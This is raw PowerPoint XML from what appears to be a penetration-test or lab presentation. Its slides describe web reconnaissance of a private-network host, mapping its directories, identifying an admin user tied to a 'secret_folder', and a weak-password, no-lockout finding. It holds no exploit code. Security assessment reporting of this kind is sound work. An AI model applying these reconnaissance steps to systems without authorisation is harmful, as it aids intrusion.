                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58E007A-CBA7-406D-B2B1-2D390219E92E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="3445786"/>
              <a:ext cx="2445074"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Navigating</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192.168.1.105/</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74" name="Rectangle 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842BF8A7-5737-4E62-B3C9-9DF85B62F9A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="630875" y="3722011"/>
              <a:ext cx="1948073"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with</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any</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web</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browser</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75" name="Shape 274">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EF5A5EC-DDEF-40F1-ACAF-8A1714CDC650}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="182806" y="247823"/>
              <a:ext cx="533372" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533372" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533372" y="58367"/>
                    <a:pt x="533372" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533372" y="397165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533372" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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6" name="Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B5FC92-DF22-4601-A25E-4F911430DC25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301687" y="332802"/>
              <a:ext cx="393020" cy="415677"/>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21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rPr>
                <a:t>01</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77" name="Shape 276">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3C6430-65FE-4CB8-8810-A997F5EC27BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318969" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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8" name="Shape 277">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA3DD28-F53A-479C-B281-9A6C82CA4F78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2954582" y="247823"/>
              <a:ext cx="533372" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533372" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533372" y="58367"/>
                    <a:pt x="533372" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533372" y="397165"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533372" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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9" name="Rectangle 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2A10956-5930-4F7C-8463-EDE77DCCCBD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3073463" y="332802"/>
              <a:ext cx="393020" cy="415677"/>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21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rPr>
                <a:t>02</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0" name="Shape 279">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71BD71E3-A5D6-4B02-BA3B-3BC9208CABC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3090745" y="636608"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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81" name="Rectangle 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEDAB85B-6985-4D7B-B45E-DBA1FAD50493}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1026437"/>
              <a:ext cx="1298445"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Achievements</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2" name="Rectangle 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1B55A5-4EC5-4A9C-B2E4-D755F4D1C9E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1235988"/>
              <a:ext cx="2484599"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Created</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file</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containing</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all</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3" name="Rectangle 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2029997B-DCF5-4EE2-9181-27C9260FFF8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1445538"/>
              <a:ext cx="2587161"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directories</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and</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file</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locations.</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4" name="Rectangle 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B91257-F7A0-4B2A-B74A-122580F4F575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="1864638"/>
              <a:ext cx="2520070"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Reviewed</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files</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to</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determine</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5" name="Rectangle 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5904A1-26FB-400D-A30F-381430838F3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2074188"/>
              <a:ext cx="2569324"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further</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reconnaissance.</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E.g.</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6" name="Rectangle 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08F8C562-BB39-4B11-9E7C-E235845F6BCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2283738"/>
              <a:ext cx="2384266"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meet_our_team/ashton.txt</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7" name="Rectangle 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E649128-762F-4FE6-AC9A-58164AE3A9E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2702838"/>
              <a:ext cx="2789447"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Found</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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Ashton</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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is</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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the</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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admin</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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for</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="30"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8" name="Rectangle 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DD0C678-C1C1-4A7F-AABA-8021B4F57C3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="2911978"/>
              <a:ext cx="2787201" cy="217736"/>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1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/company_folders/secret_folder/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-AU" sz="1100" b="1"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9" name="Rectangle 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33311070-B2DF-48B8-AC15-BC11677C9956}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5498843" y="2911978"/>
              <a:ext cx="46265" cy="217736"/>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1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0" name="Rectangle 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05038B41-080C-4016-8041-87597AC4D976}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402650" y="3102888"/>
              <a:ext cx="50065"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1" name="Shape 294">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1DDD629-7EFD-453F-B454-10D2D317805A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5859707" y="248573"/>
              <a:ext cx="533371" cy="476599"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="533371" h="476599">
                  <a:moveTo>
                    <a:pt x="79435" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453937" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="475004" y="0"/>
                    <a:pt x="495209" y="8369"/>
                    <a:pt x="510106" y="23266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525003" y="38163"/>
                    <a:pt x="533371" y="58367"/>
                    <a:pt x="533371" y="79435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="533371" y="397164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="533371" y="441035"/>
                    <a:pt x="497808" y="476599"/>
                    <a:pt x="453937" y="476599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79435" y="476599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="35564" y="476599"/>
                    <a:pt x="0" y="441035"/>
                    <a:pt x="0" y="397164"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="79435"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35564"/>
                    <a:pt x="35564" y="0"/>
                    <a:pt x="79435" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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92" name="Rectangle 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED9E036A-9199-423C-A4B9-95F54DEABAB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5978588" y="333552"/>
              <a:ext cx="393020" cy="415677"/>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21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rPr>
                <a:t>03</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3" name="Shape 296">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68BFB752-67F7-43FD-A0C3-1731502E3F95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5995870" y="637358"/>
              <a:ext cx="261029" cy="144694"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="261029" h="144694">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130515" y="144694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CC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pic>
          <p:nvPicPr>
            <p:cNvPr id="94" name="Picture 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3E06F01-2BB8-4E15-AAD9-A83EFC32CF42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6825307" y="128020"/>
              <a:ext cx="1687922" cy="2643874"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="95" name="Picture 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDECFE96-C21A-4E92-A03B-134116CBA4DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5844399" y="2159845"/>
              <a:ext cx="1941375" cy="1834899"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Rectangle 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9EDB21-8A42-4583-BE70-A4C3A76C649F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6069650" y="1026437"/>
              <a:ext cx="858807"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Results...</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2085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7CEE4-624E-474D-9300-2FA460722CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{022D31B4-E56A-4EC0-85D8-51B1B5D66BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB614C1-5FB5-40DC-A6DE-EF93C573F244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{632D393D-6B80-45F1-9A77-17AD522CE5EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC726986-CC7A-4D01-A4A1-239C280CE041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12299" y="-1"/>
            <a:ext cx="9144000" cy="5174691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="448107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Weak Password &amp; No Failed Password Lockout</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;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3" name="Google Shape;1113;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AU" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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8" name="Google Shape;1118;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1119" name="Google Shape;1119;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0" name="Google Shape;1120;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b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;1124;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5" name="Google Shape;1125;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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362180" y="1481325"/>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lang="en" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2698D15F-1FCB-4813-A002-5BB114322CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="273322" y="635771"/>
            <a:ext cx="8662671" cy="4178808"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8663251" cy="4178808"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Shape 316">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2575A318-C5D3-4139-8502-0997673967F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8595600" cy="10200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="8595600" h="10200">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
